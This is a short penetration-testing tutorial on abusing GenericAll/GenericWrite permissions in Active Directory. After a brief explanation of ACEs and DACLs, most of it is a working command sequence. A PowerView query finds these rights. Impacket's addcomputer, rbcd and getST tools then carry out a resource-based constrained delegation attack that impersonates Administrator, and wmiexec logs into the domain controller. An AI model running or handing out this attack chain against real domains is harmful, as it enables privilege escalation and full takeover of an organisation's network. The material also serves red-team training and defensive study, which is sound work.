GenericWrite/GenericAll Abuse

Access privileges for resources in Active Directory Domain Services are usually granted through the use of an Access Control Entry (ACE).

Access Control List entries describe the allowed and denied permissions for a principal in Active Directory against a securable object (user, group, computer, container, organization unit (OU), GPO etc..) DACLs (Active Directory Discretionary Access Control Lists) are lists made of ACEs (Access Control Entries) that identify the users and groups that are allowed or denied access to an object. When we have misconfigured, ACEs can be abused to operate lateral movement or privilege escalation within an AD domain.

The GenericAll/GenericWrite permission provides write access to all properties (add users to a group or reset the user’s password). ****

<aside> ℹ️ Example: If the attacker has GenericAll over any target, then he doesn’t have to know the target user’s password. He can execute a force password reset using Set-DomainUserPassword to a known value

</aside>

Using PowerView, we will check if our user has GenericAll/GenericWrite rights on the Domain Controller (<DC-COMPUTER-NAME>)

Import-module PowerView.ps1; Get-ObjectAcl -SamAccountName first-dc | ?{$_.ActiveDirectoryRights -eq "GenericAll"}

Generic write to a computer object can be used to perform a resource based constrained delegation attack.

First create a new machine:

impacket-addcomputer domain/username:'password' -dc-ip <DOMAIN.CONTROLLER.IP>

Then delegate the newly created machine to the DC, allowing the delegated machine to impersonate any user to operate the target machine under certain conditions.

impacket-rbcd -delegate-from 'COMPUTER-NAME-GENERATED$' -delegate-to '<DC-COMPUTER-NAME>$' -dc-ip <DOMAIN.CONTROLLER.IP> -action write domain/username:'password'

Then obtain the ticket, (saved to a file), which is the ticket of the new machine:

impacket-getST -spn 'cifs/<DC-COMPUTER-NAME>.domain' -impersonate Administrator -dc-ip <DOMAIN.CONTROLLER.IP> domain/<COMPUTER-NAME-GENERATED$>:'password'

Finally import the ticket and log in to the DC directly using the wmiexec tool:

KRB5CCNAME="Ticket file name as printed from getST" wmiexec.py -no-pass -k domain/administrator@<DC-COMPUTER-NAME>.domain